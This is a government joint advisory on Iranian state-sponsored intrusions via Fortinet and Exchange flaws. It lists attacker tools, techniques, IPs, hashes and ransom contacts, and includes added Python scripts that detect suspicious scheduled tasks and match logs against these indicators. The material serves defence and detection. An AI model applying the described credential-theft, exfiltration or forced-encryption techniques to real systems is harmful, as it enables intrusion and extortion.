### Summary
**Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity**

* Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
* Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).
* Use [strong, unique passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).

**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques.
This joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. FBI and CISA have observed this Iranian government-sponsored APT group exploit Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021 to gain initial access to systems in advance of follow-on operations, which include deploying ransomware. ACSC is also aware this APT group has used the same Microsoft Exchange vulnerability in Australia.
The Iranian government-sponsored APT actors are actively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations. FBI, CISA, ACSC, and NCSC assess the actors are focused on exploiting known vulnerabilities rather than targeting specific sectors. These Iranian government-sponsored APT actors can leverage this access for follow-on operations, such as data exfiltration or encryption, ransomware, and extortion.
This advisory provides observed tactics and techniques, as well as indicators of compromise (IOCs) that FBI, CISA, ACSC, and NCSC assess are likely associated with this Iranian government-sponsored APT activity.
The FBI, CISA, ACSC, and NCSC urge critical infrastructure organizations to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from Iranian government-sponsored cyber actors.
For a downloadable copy of IOCs, see AA21-321A.stix.
For more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>).
### Technical Details
### Threat Actor Activity
Since at least March 2021, the FBI and CISA have observed Iranian government-sponsored APT actors leverage Microsoft Exchange and Fortinet vulnerabilities to target a broad range of victims across multiple critical infrastructure sectors in furtherance of malicious activities. Observed activity includes the following.
* In March 2021, the FBI and CISA observed these Iranian government-sponsored APT actors scanning devices on ports 4443, 8443, and 10443 (ports commonly used by the FortiOS SSL VPN web portal) for Fortinet FortiOS vulnerability [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), and enumerating devices for FortiOS vulnerabilities [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>) and [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>). The Iranian government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks. **Note:** for previous FBI and CISA reporting on this activity, refer to Joint Cybersecurity Advisory: [APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/media/news/2021/210402.pdf>).
* In May 2021, these Iranian government-sponsored APT actors exploited a FortiGate appliance to access a webserver hosting the domain for a U.S. municipal government. The actors likely created an account with the username `elie` to further enable malicious activity. **Note:** for previous FBI reporting on this activity, refer to [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Initial Access for Malicious Activity](<https://www.ic3.gov/media/news/2021/210527.pdf>).
* In June 2021, these APT actors exploited a FortiGate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children. The Iranian government-sponsored APT actors likely leveraged a server assigned to IP addresses `91.214.124[.]143` and `162.55.137[.]20`, which FBI and CISA judge are associated with Iranian government cyber activity, to further enable malicious activity against the hospital's network. The APT actors accessed known user accounts at the hospital from IP address `154.16.192[.]70`, which FBI and CISA judge is associated with government of Iran offensive cyber activity.
* As of October 2021, these APT actors have leveraged a Microsoft Exchange ProxyShell vulnerability—`CVE-2021-34473`—to gain initial access to systems in advance of follow-on operations.
ACSC considers that this APT group has also used the same Microsoft Exchange vulnerability ([CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>)) in Australia.
### MITRE ATT&CK Tactics and Techniques
FBI, CISA, ACSC, and NCSC assess the following tactics and techniques are associated with this activity.
#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)]
The APT actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)] across several tactics.
* [Mimikatz](<https://attack.mitre.org/software/S0002>) for credential theft [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]
* WinPEAS for privilege escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]
* SharpWMI for command execution and queries via Windows Management Instrumentation (WMI)
* WinRAR for archiving collected data [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>), [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)]
* FileZilla for transferring files [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010>)]
#### Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]
The Iranian government-sponsored APT actors gained initial access by exploiting vulnerabilities affecting Microsoft Exchange servers (CVE-2021-34473) and Fortinet devices (CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591) [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)].
#### Execution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]
The Iranian government-sponsored APT actors may have made modifications to the Task Scheduler [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:
* `SynchronizeTimeZone`
* `GoogleChangeManagement`
* `MicrosoftOutLookUpdater`
* `MicrosoftOutLookUpdateSchedule`
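An exported task definition is the quickest way to see what a scheduled task actually does. The Python below is an added example, not code from the advisory: it parses the Task Scheduler XML schema (the format `schtasks /query /xml` and `Export-ScheduledTask` emit) and flags the properties a reviewer cares about: a name on the list above, an action that runs a script from a user-writable directory, and elevation. Both task definitions inside it are constructed for the example; the advisory does not reproduce the contents of the .xml artefacts listed in Appendix A. Note that `SynchronizeTimeZone` is also the name of a stock Windows task under `\Microsoft\Windows\Time Zone`, so a name match on its own is not evidence; the action is what to compare, which is why the Detection section asks for a review of recognised tasks' actions as well as for unrecognised task names.

```python
"""Review exported Task Scheduler XML for the tasks described in AA21-321A.

Added example; not code from the advisory. The task definitions below are
constructed to follow the Task Scheduler 1.2 XML schema; they are NOT the
MicrosoftOutlookUpdater.xml / GoogleChangeManagement.xml artefacts from
Appendix A, whose contents the advisory does not reproduce.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")

# Task names the advisory associates with this activity.
ADVISORY_TASK_NAMES = {"SynchronizeTimeZone", "GoogleChangeManagement",
                       "MicrosoftOutLookUpdater", "MicrosoftOutLookUpdateSchedule"}
# Locations a task action should rarely run from (assumption; tune to your baseline).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
SCRIPT_SUFFIXES = (".bat", ".cmd", ".vbs", ".js", ".ps1", ".hta")


def parse_task(xml_data):
    """Return name, author, principal and Exec actions from one task export."""
    if isinstance(xml_data, bytes):  # schtasks writes UTF-16 with a BOM
        enc = "utf-16" if xml_data[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
        xml_data = xml_data.decode(enc)
    # ElementTree refuses a str that declares a multi-byte encoding, so drop the declaration.
    root = ET.fromstring(XML_DECL_RE.sub("", xml_data, count=1).strip())
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    principal = root.find("t:Principals/t:Principal", NS)
    actions = [{"command": ex.findtext("t:Command", default="", namespaces=NS),
                "arguments": ex.findtext("t:Arguments", default="", namespaces=NS)}
               for ex in root.findall("t:Actions/t:Exec", NS)]
    return {
        "uri": uri,
        "name": uri.rsplit("\\", 1)[-1],
        "author": root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS),
        "user_id": principal.findtext("t:UserId", default="", namespaces=NS) if principal is not None else "",
        "run_level": principal.findtext("t:RunLevel", default="", namespaces=NS) if principal is not None else "",
        "actions": actions,
    }


def review_task(task):
    """Return reasons the task deserves manual review; an empty list means none found."""
    findings = []
    if task["name"] in ADVISORY_TASK_NAMES:
        findings.append(f"task name '{task['name']}' is listed in AA21-321A")
    action_findings = []
    for act in task["actions"]:
        cmd = act["command"].strip().strip('"')
        norm = cmd.lower().replace("%programdata%", "c:\\programdata")
        if norm.startswith(USER_WRITABLE_PREFIXES):
            action_findings.append(f"action runs from a user-writable path: {cmd}")
        if norm.endswith(SCRIPT_SUFFIXES):
            action_findings.append(f"action is a script rather than a binary: {cmd}")
    findings.extend(action_findings)
    # Elevation only matters once the action itself looks wrong; most stock tasks run as SYSTEM.
    if action_findings and (task["user_id"] == "S-1-5-18" or task["run_level"] == "HighestAvailable"):
        findings.append(f"suspicious action runs elevated (UserId={task['user_id'] or '-'}, "
                        f"RunLevel={task['run_level'] or '-'})")
    return findings


def review_exports(exports):
    """Map task URI -> findings for every export that has at least one finding."""
    results = {}
    for xml_data in exports:
        task = parse_task(xml_data)
        findings = review_task(task)
        if findings:
            results[task["uri"]] = findings
    return results


# Constructed: what an export of an actor-created task might look like.
SUSPECT_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>EXCH01\\Administrator</Author><URI>\\MicrosoftOutLookUpdater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\ProgramData\\MicrosoftOutlookUpdater.bat</Command></Exec></Actions>
</Task>"""

# Constructed: the stock Windows task that shares a name with the advisory's list.
STOCK_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author><URI>\\Microsoft\\Windows\\Time Zone\\SynchronizeTimeZone</URI></RegistrationInfo>
  <Principals><Principal id="LocalSystem"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="LocalSystem"><Exec><Command>%windir%\\system32\\tzsync.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for uri, findings in review_exports([SUSPECT_TASK_XML, STOCK_TASK_XML]).items():
        print(uri)
        for finding in findings:
            print("  -", finding)
```

Feed it the output of `schtasks /query /xml ONE` for each task on a host; the stock task produces only the name-match finding, which is the cue to compare its action against a known-good export rather than to treat the name as a hit.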
#### Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]
The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)]. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:
* `Support`
* `Help`
* `elie`
* `WADGUtilityAccount`
#### Exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)]
The FBI and CISA observed outbound File Transfer Protocol (FTP) transfers over port 443. Port 443 normally carries HTTPS, so FTP on that port is a protocol/port mismatch: port-based firewall rules will pass it, but application-aware firewalls, proxies, or network sensors that identify the protocol in use can flag it.
#### Impact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)]
The APT actors forced BitLocker activation on victim hosts to encrypt data [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)]. Because BitLocker is a built-in Windows feature rather than dropped malware, antivirus is unlikely to flag its use; unexpected BitLocker enablement on servers that are not normally encrypted is the signal to monitor. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information.
* sar_addr@protonmail[.]com
* WeAreHere@secmail[.]pro
* nosterrmann@mail[.]com
* nosterrmann@protonmail[.]com
## Detection
The FBI, CISA, ACSC, and NCSC recommend that organizations using Microsoft Exchange servers and Fortinet devices investigate potential suspicious activity in their networks.
* Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. **Note:** refer to Appendix A for IOCs.
* Investigate exposed Microsoft Exchange servers (both patched and unpatched) for compromise.
* Investigate changes to Remote Desktop Protocol (RDP), firewall, and Windows Remote Management (WinRM) configurations that may allow attackers to maintain persistent access.
* Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
* Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system defined or recognized scheduled tasks for unrecognized “actions” (for example, review the steps each scheduled task is expected to perform).
* Review antivirus logs for indications they were unexpectedly turned off.
* Look for WinRAR and FileZilla in unexpected locations.
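As an added example (not part of the advisory), the Python below collects the indicators published in this advisory (the Appendix A IP addresses, the account and scheduled-task names, the ransom-note addresses, and the MD5/SHA-256 values from Table 1) and runs them over a few constructed log lines of the kind a SIEM export would contain, including the FTP-over-TCP-443 protocol/port mismatch reported under Exfiltration. The key=value log format is an assumption for the example, not any product's schema. Hits on the frp binaries are marked dual-use, because Table 1 notes those files are identical to the public fatedier/frp release: a hash match shows the tool is present, not who deployed it.

```python
"""Match log lines against the indicators published in AA21-321A.

Added example; not code from the advisory. Indicator values come from the
advisory text. The log lines are constructed for this example in a simple
key=value export format, not any particular product's schema.
"""
import re

IOC_IPS = {"91.214.124.143", "162.55.137.20", "154.16.192.70"}
IOC_ACCOUNTS = {"support", "help", "elie", "wadgutilityaccount"}
IOC_TASKS = {"synchronizetimezone", "googlechangemanagement",
             "microsoftoutlookupdater", "microsoftoutlookupdateschedule"}
IOC_EMAILS = {"sar_addr@protonmail.com", "wearehere@secmail.pro",
              "nosterrmann@mail.com", "nosterrmann@protonmail.com"}
# Audio.exe/frpc.exe and Frps.exe are identical to the public fatedier/frp
# release, so a hit on these proves the tool is present, not who installed it.
DUAL_USE_HASHES = {
    "b90f05b5e705e0b0cb47f51b985f84db",
    "28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa",
    "26f330dadcdd717ef575aa5bfcdbe76a",
    "d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a",
}
# Table 1 mixes upper- and lower-case hex; normalise once here (MD5 and SHA-256 only).
IOC_HASHES = {h.lower() for h in (
    "1444884faed804667d8c2bfa0d63ab13",
    "c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624",
    "1A44368EB5BF68688BA4B4357BDC874F",
    "3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4",
    "AA40C49E309959FA04B7E5AC111BB770",
    "5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6",
    "AF2D86042602CBBDCC7F1E8EFA6423F9",
    "4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D",
    "e64064f76e59dea46a0768993697ef2f",
)} | DUAL_USE_HASHES

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HEX_RE = re.compile(r"\b(?:[0-9a-fA-F]{64}|[0-9a-fA-F]{40}|[0-9a-fA-F]{32})\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
ACCOUNT_FIELDS = ("targetusername", "subjectusername", "user", "account")


def match_line(line):
    """Return the reasons a single log line matches an indicator ([] if none)."""
    reasons = []
    kv = {k.lower(): v.strip('"') for k, v in KV_RE.findall(line)}
    for ip in set(IPV4_RE.findall(line)) & IOC_IPS:
        reasons.append(f"IP {ip} is listed in Appendix A")
    for h in {h.lower() for h in HEX_RE.findall(line)} & IOC_HASHES:
        note = " (dual-use frp binary)" if h in DUAL_USE_HASHES else ""
        reasons.append(f"hash {h[:12]}... is listed in Table 1{note}")
    for addr in {e.lower() for e in EMAIL_RE.findall(line)} & IOC_EMAILS:
        reasons.append(f"ransom-note contact address {addr}")
    for field in ACCOUNT_FIELDS:  # exact match only: 'helpdesk' must not hit 'help'
        if kv.get(field, "").lower() in IOC_ACCOUNTS:
            reasons.append(f"account name '{kv[field]}' ({field}) is listed in the advisory")
    task = kv.get("taskname", "")
    if task.lstrip("\\").rsplit("\\", 1)[-1].lower() in IOC_TASKS:
        reasons.append(f"scheduled task '{task}' is listed in the advisory")
    # The advisory reports FTP carried over TCP 443: a protocol/port mismatch
    # that application-aware logging exposes even though the port looks normal.
    if kv.get("app", "").lower() == "ftp" and kv.get("dst_port") == "443":
        reasons.append("FTP over port 443 (protocol/port mismatch)")
    return reasons


def scan(lines):
    """Return [(line_index, reasons)] for every line with at least one match."""
    hits = []
    for i, line in enumerate(lines):
        reasons = match_line(line)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample lines covering firewall, Windows Security (4720 = account
# created, 4698 = scheduled task created), EDR and mail-gateway sources.
# 203.0.113.0/24 is a documentation range used here as a benign destination.
SAMPLE_LOGS = [
    "ts=2021-06-02T03:14:07Z src=fw event=conn src_ip=10.20.30.40 dst_ip=154.16.192.70 dst_port=443 proto=tcp app=ftp bytes_out=48211234",
    "ts=2021-06-02T03:20:11Z src=winsec EventID=4720 TargetUserName=Support SubjectUserName=svc_exchange Computer=EXCH01",
    "ts=2021-06-02T03:25:44Z src=winsec EventID=4698 TaskName=\\MicrosoftOutLookUpdater SubjectUserName=Support Computer=EXCH01",
    'ts=2021-06-02T04:01:02Z src=edr event=file_create path="C:\\ProgramData\\Audio.exe" sha256=28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa',
    "ts=2021-06-02T04:05:30Z src=fw event=conn src_ip=10.20.30.41 dst_ip=203.0.113.10 dst_port=443 proto=tcp app=ssl bytes_out=1201",
    'ts=2021-06-03T09:12:00Z src=mail event=deliver from=sar_addr@protonmail.com subject="READ ME"',
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOGS):
        print(f"line {i}: {SAMPLE_LOGS[i][:70]}...")
        for reason in reasons:
            print("   ", reason)
```

Account and task names are matched exactly and case-insensitively; a broader substring match on `Support` or `Help` would drown the analyst in false positives, which is the trade-off the advisory's own note about look-alike account names implies.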
**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.
### Mitigations
The FBI, CISA, ACSC, and NCSC urge network defenders to apply the following mitigations to reduce the risk of compromise by this threat.
#### Patch and Update Systems
* Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
* Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
#### Evaluate and Update Blocklists and Allowlists
* Regularly evaluate and update blocklists and allowlists.
* If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization’s execution blocklist. Any attempts to install or run this program and its associated files should be prevented.
#### Implement and Enforce Backup and Restoration Policies and Procedures
* Regularly back up data, air gap, and password protect backup copies offline.
* Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
* Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
#### Implement Network Segmentation
* Implement network segmentation to restrict adversary’s lateral movement.
#### Secure User Accounts
* Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.
* Require administrator credentials to install software.
#### Implement Multi-Factor Authentication
* Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems.
#### Use Strong Passwords
* Require all accounts with password logins to have strong, unique passwords.
#### Secure and Monitor RDP and other Potentially Risky Services
* If you use RDP, restrict it to limit access to resources over internal networks.
* Disable unused remote access/RDP ports.
* Monitor remote access/RDP logs.
#### Use Antivirus Programs
* Install and regularly update antivirus and anti-malware software on all hosts.
#### Secure Remote Access
* Only use secure networks and avoid using public Wi-Fi networks.
* Consider installing and using a VPN for remote access.
#### Reduce Risk of Phishing
* Consider adding an email banner to emails received from outside your organization.
* Disable hyperlinks in received emails.
## Resources
* For more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>).
* For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.
* The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
* CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
* The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/english>) website for more information and how to report information securely.
* ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at [cyber.gov.au](<https://www.cyber.gov.au/>) and via 1300 292 371 (1300 CYBER1).
### Appendix A: Indicators of Compromise
IP addresses and executable files are listed below. For a downloadable copy of IOCs, see AA21-321A.stix.
#### IP Addresses
* `91.214.124[.]143`
* `162.55.137[.]20`
* `154.16.192[.]70`
#### Executable Files
Executable files observed in this activity are identified in table 1.
Table 1: Executable Files
Field | Value
---|---
**Filename** | MicrosoftOutLookUpdater[.]exe
MD5 | 1444884faed804667d8c2bfa0d63ab13
SHA-1 | 95E045446EFB8C9983EBFD85E39B4BE5D92C7A2A
SHA-256 | c51fe5073bd493c7e8d83365aace3f9911437a0f2ae80042ba01ea46b55d2624
SHA-512 | 6451077B99C5F8ECC5C0CA88FE272156296BEB91218B39AE28A086DBA5E7E39813F044F9AF0FEDBB260941B1CD52FA237C098CBF4B2A822F08E3E98E934D0ECF
**Filename** | **MicrosoftOutlookUpdater.bat**
MD5 | 1A44368EB5BF68688BA4B4357BDC874F
SHA-1 | FA36FEBFD5A5CA0B3A1B19005B952683A7188A13
SHA-256 | 3A08D0CB0FF4D95ED0896F22F4DA8755525C243C457BA6273E08453E0E3AC4C4
SHA-512 | 70AA89449EB5DA1D84B70D114EF9D24CB74751CE12D12C783251E51775C89FDCE61B4265B43B1D613114D6A85E9C75927B706F39C576DBB036079C7E8CAF28B2
**Filename** | **MicrosoftOutlookUpdater.xml**
MD5 | AA40C49E309959FA04B7E5AC111BB770
SHA-1 | F1D90E10E6E3654654E0A677763C9767C913F8F0
SHA-256 | 5C818FE43F05F4773AD20E0862280B0D5C66611BB12459A08442F55F148400A6
SHA-512 | E55A86159F2E869DCDB64FDC730DA893718E20D65A04071770BD32CAE75FF8C34704BDF9F72EF055A3B362759EDE3682B3883C4D9BCF87013076638664E8078E
**Filename** | **GoogleChangeManagement.xml**
MD5 | AF2D86042602CBBDCC7F1E8EFA6423F9
SHA-1 | CDCD97F946B78831A9B88B0A5CD785288DC603C1
SHA-256 | 4C691CCD811B868D1934B4B8E9ED6D5DB85EF35504F85D860E8FD84C547EBF1D
SHA-512 | 6473DAC67B75194DEEAEF37103BBA17936F6C16FFCD2A7345A5A46756996FAD748A97F36F8FD4BE4E1F264ECE313773CC5596099D68E71344D8135F50E5D8971
**Filename** | **Connector3.exe**
MD5 | e64064f76e59dea46a0768993697ef2f
**Filename** | **Audio.exe or frpc.exe**
MD5 | b90f05b5e705e0b0cb47f51b985f84db
SHA-1 | 5bd0690247dc1e446916800af169270f100d089b
SHA-256 | 28332bdbfaeb8333dad5ada3c10819a1a015db9106d5e8a74beaaf03797511aa
Vhash | 017067555d5d15541az28!z
Authentihash | ed463da90504f3adb43ab82044cddab8922ba029511da9ad5a52b8c20bda65ee
Imphash | 93a138801d9601e4c36e6274c8b9d111
SSDEEP | 98304:MeOuFco2Aate8mjOaFEKC8KZ1F4ANWyJXf/X+g4:MeHFV2AatevjOaDC8KZ1xNWy93U
Note | Identical to "frpc.exe" available at https://github[.]com/fatedier/frp/releases/download/v0.34.3/frp_0.34.3_windows_amd64.zip
**Filename** | **Frps.exe**
MD5 | 26f330dadcdd717ef575aa5bfcdbe76a
SHA-1 | c4160aa55d092cf916a98f3b3ee8b940f2755053
SHA-256 | d7982ffe09f947e5b4237c9477af73a034114af03968e3c4ce462a029f072a5a
Vhash | 017057555d6d141az25!z
Authentihash | 40ed1568fef4c5f9d03c370b2b9b06a3d0bd32caca1850f509223b3cee2225ea
Imphash | 91802a615b3a5c4bcc05bc5f66a5b219
SSDEEP | 196608:/qTLyGAlLrOt8enYfrhkhBnfY0NIPvoOQiE:GLHiLrSfY5voO
Note | Identical to "frps.exe" available at https://github[.]com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_windows_amd64.zip

Because the frpc.exe and frps.exe hashes are those of a publicly distributed reverse-proxy tool, a hash match on them shows that frp is present and should prompt an investigation of who deployed it and why; on its own it is not attribution to this actor.
### Appendix B: MITRE ATT&CK Tactics and Techniques
Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.
Table 2: Observed Tactics and Techniques
Tactic | Technique
---|---
Resource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042>)] | Obtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v10/techniques/T1588/001>)]; Obtain Capabilities: Tool [[T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>)]
Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)] | Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]
Execution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)] | Scheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>)]
Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)] | Create Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>)]; Create Account: Domain Account [[T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)]
Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)] |
Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)] |
Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009>)] | Archive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001>)]
Exfiltration [[TA0010](<https://attack.mitre.org/versions/v10/tactics/TA0010/>)] |
Impact [[TA0040](<https://attack.mitre.org/versions/v10/tactics/TA0040>)] | Data Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)]
### Contact Information
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <https://www.fbi.gov/contact-us/field-offices>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov> "Email CISA Central" ). Australian organizations can visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
### Revisions
* November 17, 2021: Initial Version
* November 19, 2021: Added STIX files
{"id": "AA21-321A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities", "description": "### Summary\n\n_**Actions to Take Today to Protect Against Iranian State-Sponsored Malicious Cyber Activity** \n\u2022 Immediately patch software affected by the following vulnerabilities: CVE-2021-34473, 2018-13379, 2020-12812, and 2019-5591._ \n\u2022 _Implement [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._ \n_\u2022 Use [strong, unique passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>).v_\n\n___**Note:** this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v9/techniques/enterprise/>) for all referenced threat actor tactics and techniques.___\n\nThis joint cybersecurity advisory is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight ongoing malicious cyber activity by an advanced persistent threat (APT) group that FBI, CISA, ACSC, and NCSC assess is associated with the government of Iran. 